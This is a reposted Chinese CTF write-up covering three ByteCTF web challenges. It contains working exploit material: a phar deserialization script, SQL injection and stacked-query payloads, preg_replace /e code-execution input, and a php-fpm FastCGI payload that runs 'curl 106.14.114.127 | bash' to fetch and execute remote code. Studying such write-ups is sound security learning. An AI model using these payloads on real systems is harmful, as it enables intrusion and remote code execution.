Bytectf-几道web总结

Posted wfzwebsecuity

tags:

篇首语:本文由小常识网(cha138.com)小编为大家整理,主要介绍了Bytectf-几道web总结相关的知识,希望对你有一定的参考价值。

1.EZcms

这道题思路挺明确,给了源码,考点就是md5哈希扩展+phar反序列化

首先这道题会在上传的文件目录下生成无效的.htaccess,从而导致无法执行上传的webshell,所以就需要想办法删除掉.htaccess

这里主要记录一点,利用php内置类进行文件操作,

exp为:

<?php
class File
    public $filename;
    public $filepath;
    public $checker;

    function __construct() 
        $this->checker = new Profile();
    


class Profile

    public $username;
    public $password;
    public $admin;

    function __construct() 
        $this->admin = new ZipArchive;
        $this->username = ‘/var/www/html/sandbox/fd40c7f4125a9b9ff1a4e75d293e3080/.htaccess‘;
        $this->password = ZIPARCHIVE::OVERWRITE;
    


@unlink("test.phar");
$phar = new Phar("test.phar");
$phar->startBuffering();
$phar->setStub("<?php __HALT_COMPILER();?>");
$o = new File();
$phar->setMetadata($o);
$phar->addFromString("test.txt", "test");
$phar->stopBuffering();

通过反序列化File类,从而调用Profile类的upload_file函数,此时触发Profile类的call方法,

技术图片

 

 技术图片

 

这里实际调用了open方法,其实Profile类里没有这个方法,所以去内置类中找,并且admin可控为任何内置类,这里用到了Archive::open方法来覆盖写文件,当然这是一个原题的知识点,这里记录一下如何找到它,fuzz的代码如下:

<?php
echo "get_declared_classes()"."\\n";
$a=get_declared_classes();
foreach($a as $class)

  $arr_func=get_class_methods($class);
  echo $class."\\n";
  var_dump($arr_func);

技术图片

 

 通过get_declared_classes和get_class_methods方法就能够获得php所有内置类对应的方法,此时只要进行一个简单的字符串匹配,就能找到同名的所需要的函数,以后遇到需要用到内置类的同名方法时也能够进行快速fuzz

技术图片

<?php
#echo "get_declared_classes()"."\\n";
$a=get_declared_classes();
foreach($a as $class)

  $arr_func=get_class_methods($class);
  foreach($arr_func as $func)
        if($func=="open")
        echo $class." ".$func."\\n";


技术图片

 

 技术图片

 

 其中open函数可以指定覆盖模式,此时第一参数即为要删除的文件名,此时就能够满足对.htaccess文件的删除,后续操作即上传phar文件,利用suctf中

php://filter/resource=phar://来进行phar反序列化,这里上传shell时会对内容过滤一些常见关键字:

技术图片

 使用php字符串连接.点绕过即可

2.Boring code

<?php
function is_valid_url($url) 
    if (filter_var($url, FILTER_VALIDATE_URL)) 
        if (preg_match(‘/data:\\/\\//i‘, $url)) 
            return false;
        
        return true;
    
    return false;


if (isset($_POST[‘url‘]))
    $url = $_POST[‘url‘];
    if (is_valid_url($url)) 
        $r = parse_url($url);
        if (preg_match(‘/baidu\\.com$/‘, $r[‘host‘])) 
            $code = file_get_contents($url);
            if (‘;‘ === preg_replace(‘/[a-z]+\\((?R)?\\)/‘, NULL, $code)) 
                if (preg_match(‘/et|na|nt|strlen|info|path|rand|dec|bin|hex|oct|pi|exp|log/i‘, $code)) 
                    echo ‘bye~‘;
                 else 
                    eval($code);
                
            
         else 
            echo "error: host not allowed";
        
     else 
        echo "error: invalid url";
    
else
    highlight_file(__FILE__);

取$url下的内容传入eval执行,这里过滤了data协议,否则可以通过

data://baidu.com/plain;base64,PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pgo=

来绕过preg_match的检查,这里目前我知道有三种解决方法:

1.可以直接购买一个xxxxxbaidu.com的域名

2.或者利用百度的url跳转

技术图片

3.利用百度云自动生成的链接

技术图片

 

 这里将直接显示文件完整的链接,此时在php中使用file_get_contents试试:

技术图片

 此时能够直接对远程文件内容进行获取,也满足了题目baidu.com的条件的限制,此时第一层preg已经可以绕过,

if (‘;‘ === preg_replace(‘/[a-z]+\\((?R)?\\)/‘, NULL, $code)) 

这里用到了递归匹配,即最终匹配到的函数调用格式只能是a(b(c())),并且是无参数的

https://zh.functions-online.com/preg_replace.html

技术图片

 

 技术图片

又因为题目的flag已经提示在../index.php,所以要读到这个文件:

readfile(end(scandir(‘.‘)));

以上一段代码会返回当前文件夹的最后一个文件

而当前正则不能使用.点,所以要构造出一个.点,

关键函数1:

localeconv,函数返回一包含本地数字及货币格式信息的数组。

 技术图片

 

 结合pos函数或者current函数获取数组中的指定元素,默认是第一个元素,当然可以结合next函数返回第二个元素;

 技术图片

 因为此时要跨目录,所以需要chdir切换一下目录

技术图片

 此时可以使用chdir切换目录,但是chdir返回值为1或者0,不能够返回一个.点,因此使用localtime()+time()函数结合起来可以返回1个int数组,此时使用pos()函数获取第一个元素

即为当前秒数,那么当为每分钟46秒时将结合chr函数返回.点。

 技术图片

 

 所以此时payload已经很明确,为:

echo(readfile(end(scandir(chr(pos(localtime(time(chdir(next(scandir(pos(localeconv()))))))))))));

此时只要将payload放到百度云盘上,并获取此链接,然后再burp重复发包即可,这里也可以使用如下的payload:

if(chdir(next(scandir(pos(localeconv())))))readfile(end(scandir(pos(localeconv()))));

利用if(1),从而来执行readfile()函数

3.BabyBlog

 这道题主要是二次注入,这里主要漏洞点在$content,这里直接使用addslashes进行一个转义

技术图片

 而在edit.php中,这里直接将存进库中的title数据查出来并拼接到update语句中,所以这里明显存在二次注入,脏数据没有进行过滤,只是进行了入库前的转义,从而导致漏洞的产生,这里引入了config.php来对get和post的参数进行了检测

技术图片

 注入点在此,并且在replace.php中,这里可以拼接preg_match,并且php的版本为5.3.29,php版本5.4以下都存在%00截断问题,以及结合/e选项进行代码执行

 技术图片

 这里$_POST[‘find‘]=.*/e%00  $_POST[‘replace‘]=phpinfo(); 

preg_replace("/" . $_POST[‘find‘] . "/", $_POST[‘replace‘], $row[‘content‘]

就能够执行phpinfo();

技术图片

 而在register.php中,我们已经知道此时注册的用户默认isvip等于0,那么只有通过注入来实现让isvip为1,那么有两种方法:

1.通过注入来找到数据库中已经存在的isvip为1的用户;

2.通过注入来将当前我们注册的用户的isvip字段更新为1;

 技术图片

第一种方法:

第一种方法,貌似不是出题人的主要考点,初始数据库中没有任何用户,第二种方法我觉得才是预期做法,利用PDO在php5.3以后是支持堆叠查询,从而更新当前用户的is_vip字段

技术图片

首先注册一个用户,此时可以看到isvip为0,在writing.php页面,因为已经知道注入点在title字段,所以我们此时提交注入的payload,当然在这里本地肯定一定要测试一下payload,能否通过waf检测

<?php
$sql = new PDO("mysql:host=localhost;dbname=babyblog", ‘root‘, ‘root‘) or die("SQL Server Down T.T");
function SafeFilter(&$arr)
        foreach ($arr as $key => $value) 
                if (!is_array($value))
                        $filter = "benchmark\\s*?\\(.*\\)|sleep\\s*?\\(.*\\)|load_file\\s*?\\\\(|\\\\b(and|or)\\\\b\\\\s*?([\\\\(\\\\)‘\\"\\\\d]+?=[\\\\(\\\\)‘\\"\\\\d]+?|[\\\\(\\\\)‘\\"a-zA-Z]+?=[\\\\(\\\\)‘\\"a-zA-Z]+?|>|<|\\s+?[\\\\w]+?\\\\s+?\\\\bin\\\\b\\\\s*?\\(|\\\\blike\\\\b\\\\s+?[\\"‘])|\\\\/\\\\*.*\\\\*\\\\/|<\\\\s*script\\\\b|\\\\bEXEC\\\\b|UNION.+?SELECT\\s*(\\(.+\\)\\s*|@1,2.+?\\s*|\\s+?.+?|(`|‘|\\").*?(`|‘|\\")\\s*)|UPDATE\\s*(\\(.+\\)\\s*|@1,2.+?\\s*|\\s+?.+?|(`|‘|\\").*?(`|‘|\\")\\s*)SET|INSERT\\\\s+INTO.+?VALUES|(SELECT|DELETE)@0,2(\\\\(.+\\\\)|\\\\s+?.+?\\\\s+?|(`|‘|\\").*?(`|‘|\\")|(\\+|-|~|!|@:=|" . urldecode(‘%0B‘) . ").+?)FROM(\\\\(.+\\\\)|\\\\s+?.+?|(`|‘|\\").*?(`|‘|\\"))|(CREATE|ALTER|DROP|TRUNCATE)\\\\s+(TABLE|DATABASE)";
                        if(preg_match(‘/‘ . $filter . ‘/is‘,$value))
                      echo  preg_replace(‘/‘.$filter.‘/is‘,"@@@",$value);
                        echo "123";
                        
else
echo "321";

                else
                        SafeFilter($arr[$key]);
                
        

$_GET && SafeFilter($_GET);

 本地测试payload:

1‘ ^ (ascii(substr((select group_concat(table_name) from information_schema.tables where table_schema=database()),1,1))>1) ^‘1

技术图片

技术图片

此时select a from b这种形式被过滤了

但是可以用select(a)from b

 

 技术图片

 

 综上payload可以更换为:

技术图片

1‘ ^ (ascii(substr((select(group_concat(table_name)) from (information_schema.tables)where table_schema=database()),1,1))>1)  ^ ‘1

此时我们可以测试一下:

技术图片

 

 当提交如上payload,即取所有表名连接起来的第一位ascii大于1,此时update的where拼接应该是:

where title=‘1‘ ^ (ascii(substr((select(group_concat(table_name)) from (information_schema.tables)where table_schema=database()),1,1))>1)  ^ ‘1‘

技术图片

 

 此时更新这条blog的title为12345

技术图片

 

 此时我们对应的id的title和content将被更新为12345,默认为最新的一条blog,因为此时where条件为1

那么另一种逻辑为:

1‘ ^ (ascii(substr((select(group_concat(table_name)) from (information_schema.tables)where table_schema=database()),1,1))>200)  ^ ‘1

技术图片

 

 此时edit更新其值是不能成功的,因为where条件为0

技术图片

 

 当然在命令行下也是可以验证这种逻辑的,因此基于这种逻辑就能够依次暴库、表、字段,所以编写脚本时只需要注意两点:

1.在writing.php写payload

2.在edit.php更新blog,因为需要更新最新的一条为含有payload的blog,而每条blog有对应的id,因此需要正则匹配所有的id号并取列表第一个即为最新的id,此时更改此条id的blog,若当前查的数据ascii为10,payload为<10,则更新成功,依次增大payload中ascii码,直到更新失败,此时ascii-1即为当前查的数据的ascii码值

基于以上两条即可得到isvip为1的用户的账号和密码,前提是别人已经更新成功isvip为1的用户。

第二种方法

第二种采用堆叠注入的形式,直接update当前用户为isvip为1

 payload为:

tr1ple‘;SET @SQL=0x757064617465207573657273207365742069737669703d3120776865726520757365726e616d653d22747231706c65223b;PREPARE sql FROM @SQL;EXECUTE sql;# 

这样就能更新tr1ple用户的isvip为1

 技术图片

 

 并且此时本地测试payload是可以通过的

技术图片

 

 技术图片

 此时回到数据库中可以看到此时isvip已经为1,那么此时就可以进行第二步了,结合preg_match的%00截断正则匹配表达式,并且此时配合/e参数来进行rce

 技术图片

 

 后面就是常规的套路,绕过openbase_dir和绕过disable_function

<?php
$file_list = array();
// normal files
$it = new DirectoryIterator("glob:///*");
foreach($it as $f) 
    $file_list[] = $f->__toString();

// special files (starting with a dot(.))
$it = new DirectoryIterator("glob:///.*");
foreach($it as $f) 
    $file_list[] = $f->__toString();

sort($file_list);
foreach($file_list as $f)
        echo "$f<br/>";

?>

此时可以用以上代码进行bypass列文件,可以在根目录发现readflag,一般来说肯定要调用readflag来读取flag,所以此时要执行readflag,没有禁用error_log,因此可以使用putenv+error_log来进行bypass diable_function,当然这道题也可以用打php-fpm来绕过openbase_dir和disable_function

$fp = stream_socket_client("套接字地址", $errno, $errstr,30);
$out = urldecode("%01%01%1C%AE%00%08%00%00%00%01%00%00%00%00%00%00%01%04%1C%AE%01%DC%00%00%0E%02CONTENT_LENGTH51%0C%10CONTENT_TYPEapplication/text%0B%04REMOTE_PORT9985%0B%09SERVER_NAMElocalhost%11%0BGATEWAY_INTERFACEFastCGI/1.0%0F%0ESERVER_SOFTWAREphp/fcgiclient%0B%09REMOTE_ADDR127.0.0.1%0F%17SCRIPT_FILENAME/var/www/html/index.php%0B%17SCRIPT_NAME/var/www/html/index.php%09%1FPHP_VALUEauto_prepend_file%20%3D%20php%3A//input%0E%04REQUEST_METHODPOST%0B%02SERVER_PORT80%0F%08SERVER_PROTOCOLHTTP/1.1%0C%00QUERY_STRING%0F%17PHP_ADMIN_VALUEextension%20%3D%20/tmp/sky.so%0D%01DOCUMENT_ROOT/%0B%09SERVER_ADDR127.0.0.1%0B%17REQUEST_URI/var/www/html/index.php%01%04%1C%AE%00%00%00%00%01%05%1C%AE%003%00%00%3C%3Fphp%20hello_world%28%27curl%20106.14.114.127%20%7C%20bash%27%29%3B%20%3F%3E%01%05%1C%AE%00%00%00%00");
stream_socket_sendto($fp,$out);
while (!feof($fp))
echo htmlspecialchars(fgets($fp, 10)); fclose($fp);

这里可以直接与目标unix 套接字进行通信,其中变量$out即为发送到目标套接字的地址,payload可以根据p牛的python脚本进行更改,改为只输入payload不发出payload,此时再通过此执行此php文件来

php_value = "allow_url_include = On\\nsafe_mode = Off\\nopen_basedir = /\\nextension_dir = /tmp\\nextension = tr1ple.so\\nauto_prepen_file=php://input

这样我们就可以上传该exp文件,并且上传so文件到tmp目录,然后打php-fpm,只需要php://input中结putenv+errorlog即可进行rce

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

以上是关于Bytectf-几道web总结的主要内容,如果未能解决你的问题,请参考以下文章

几道 SQL 笔试题面试题总结

数论题总结

杜教筛 学习总结

数学之欧拉函数 &几道poj欧拉题

刷题记录:[ByteCTF 2019]BabyBlog

[Leetcode] Backtracking回溯法解题思路